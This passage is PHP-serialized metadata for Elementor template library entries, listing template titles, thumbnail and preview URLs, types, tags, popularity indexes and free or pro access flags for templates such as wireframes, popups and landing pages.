Psychologist\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/PopUp.png\";s:12:\"tmpl_created\";i:1600170487;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:578;s:11:\"trend_index\";i:312;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:174;a:21:{s:4:\"tmpl\";i:899;s:2:\"id\";i:11839;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Header_small.png\";s:12:\"tmpl_created\";i:1569430015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"creative portfolio\",\"header\",\"portfolio\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:189;s:11:\"trend_index\";i:20;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:175;a:21:{s:4:\"tmpl\";i:1433;s:2:\"id\";i:24477;s:5:\"title\";s:27:\"Wireframe – Gallery 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Gallery-2.jpg\";s:12:\"tmpl_created\";i:1653988835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-gallery-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"Business\",\"Contact\",\"Design\",\"Footer\",\"Gallery\",\"Header\",\"Portfolio\",\"Services\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:176;a:21:{s:4:\"tmpl\";i:1205;s:2:\"id\";i:20233;s:5:\"title\";s:32:\"Art Magazine – Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633881371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:177;a:21:{s:4:\"tmpl\";i:1214;s:2:\"id\";i:20539;s:5:\"title\";s:31:\"Design Blog – Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:178;a:21:{s:4:\"tmpl\";i:1224;s:2:\"id\";i:21013;s:5:\"title\";s:24:\"Restaurant – About\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/12/7-About-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638795588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:36:\"[\"About\",\"Chef\",\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:179;a:21:{s:4:\"tmpl\";i:992;s:2:\"id\";i:13402;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/04/Popup-Course-Completed.jpg\";s:12:\"tmpl_created\";i:1587474772;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:619;s:11:\"trend_index\";i:582;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:180;a:21:{s:4:\"tmpl\";i:1206;s:2:\"id\";i:20254;s:5:\"title\";s:41:\"Digital Marketing Agency – Business\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Digital-Marketing-Agency-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/digital-marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:65:\"[\"Agency\",\"Business\",\"Digital Agency\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:181;a:21:{s:4:\"tmpl\";i:1235;s:2:\"id\";i:21281;s:5:\"title\";s:25:\"Law Firm – Services\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/16-Services-Law-firm.jpg\";s:12:\"tmpl_created\";i:1638819128;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/law-firm-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Consulting\",\"Law\",\"Law Firm\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:182;a:21:{s:4:\"tmpl\";i:1017;s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:717;s:11:\"trend_index\";i:697;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:183;a:21:{s:4:\"tmpl\";i:1213;s:2:\"id\";i:20509;s:5:\"title\";s:40:\"Dogs Adoption – Social Involvement\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/10/Dog-Adoption-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/dogs-adoption-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:49:\"[\"Adoption\",\"Involvement\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:184;a:21:{s:4:\"tmpl\";i:1233;s:2:\"id\";i:21205;s:5:\"title\";s:29:\"Photographer – Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/25-Projects-Photographer.jpg\";s:12:\"tmpl_created\";i:1638818372;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/photographer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Black and white\",\"Photography\",\"Project\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:185;a:21:{s:4:\"tmpl\";i:993;s:2:\"id\";i:13422;s:5:\"title\";s:30:\"Classic | Menu | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1587474782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-menu-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:516;s:11:\"trend_index\";i:432;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:186;a:21:{s:4:\"tmpl\";i:925;s:2:\"id\";i:12540;s:5:\"title\";s:33:\"Classic | Menu | Travel and tours\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_Menu_s.png\";s:12:\"tmpl_created\";i:1575960267;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-menu-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:690;s:11:\"trend_index\";i:714;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:187;a:21:{s:4:\"tmpl\";i:1208;s:2:\"id\";i:20361;s:5:\"title\";s:51:\"Exercise & Fitness Equipment – eCommerce\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2021/10/Exercise-Fitness-Equipment-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633883766;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/lp/exercise-fitness-equipment-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Fitness\",\"Health\",\"Landing Pages\",\"Online Shop\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:188;a:21:{s:4:\"tmpl\";i:1239;s:2:\"id\";i:21373;s:5:\"title\";s:28:\"Photographer – Gallery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/18-Gallery-Photographer.jpg\";s:12:\"tmpl_created\";i:1638821177;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/photographer-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Gallery\",\"Photography\",\"Portfolio\",\"Project\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:189;a:21:{s:4:\"tmpl\";i:1426;s:2:\"id\";i:24348;s:5:\"title\";s:24:\"Wireframe – Home 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-2.jpg\";s:12:\"tmpl_created\";i:1653988444;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:190;a:21:{s:4:\"tmpl\";i:958;s:2:\"id\";i:13129;s:5:\"title\";s:28:\"Classic | Menu | Photography\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/PopUp_s.png\";s:12:\"tmpl_created\";i:1582092645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-menu-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:646;s:11:\"trend_index\";i:521;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:191;a:21:{s:4:\"tmpl\";i:1427;s:2:\"id\";i:24366;s:5:\"title\";s:24:\"Wireframe – Home 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-3.jpg\";s:12:\"tmpl_created\";i:1653988491;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:192;a:21:{s:4:\"tmpl\";i:1207;s:2:\"id\";i:20299;s:5:\"title\";s:51:\"Interior Design Consultation – Online Service\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2021/10/Interior-Design-Consultation-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/lp/interior-design-consultation-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:65:\"[\"Consulting\",\"Interior Design\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:193;a:21:{s:4:\"tmpl\";i:952;s:2:\"id\";i:12726;s:5:\"title\";s:52:\"Classic | Newsletter | Subscribe | Magazine and Blog\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_Newsletter_s.png\";s:12:\"tmpl_created\";i:1579061019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/classic-newsletter-subscribe-magazine-and-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:357;s:11:\"trend_index\";i:281;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:194;a:21:{s:4:\"tmpl\";i:883;s:2:\"id\";i:11468;s:5:\"title\";s:20:\"Classic | Sale | Gym\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/08/PopUp_Small.png\";s:12:\"tmpl_created\";i:1567393182;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/classic-sale-gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:696;s:11:\"trend_index\";i:740;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:195;a:21:{s:4:\"tmpl\";i:1216;s:2:\"id\";i:20623;s:5:\"title\";s:57:\"Luxurious Camping Accommodation For Events – Events\";s:9:\"thumbnail\";s:113:\"https://library.elementor.com/wp-content/uploads/2021/10/Luxurious-Camping-Accommodation-For-Events-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634041681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/luxurious-camping-accommodation-for-events-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:43:\"[\"Event\",\"Events\",\"Landing Pages\",\"Travel\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:196;a:21:{s:4:\"tmpl\";i:1219;s:2:\"id\";i:20886;s:5:\"title\";s:28:\"Online Training – Home\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/12/2-Home-Online-Training.jpg\";s:12:\"tmpl_created\";i:1638784769;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/online-training-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Fitness\",\"Online\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:197;a:21:{s:4:\"tmpl\";i:1065;s:2:\"id\";i:15570;s:5:\"title\";s:33:\"Classic | Subscribe | Travel Blog\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp.jpg\";s:12:\"tmpl_created\";i:1606215555;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscribe-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:709;s:11:\"trend_index\";i:459;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:198;a:21:{s:4:\"tmpl\";i:1431;s:2:\"id\";i:24437;s:5:\"title\";s:25:\"Wireframe – About 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-4.jpg\";s:12:\"tmpl_created\";i:1653988733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:74:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:199;a:21:{s:4:\"tmpl\";i:1210;s:2:\"id\";i:20414;s:5:\"title\";s:45:\"Online English Courses – Online Service\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Online-English-Courses-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/online-english-courses-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:50:\"[\"Course Online\",\"Landing Pages\",\"Online 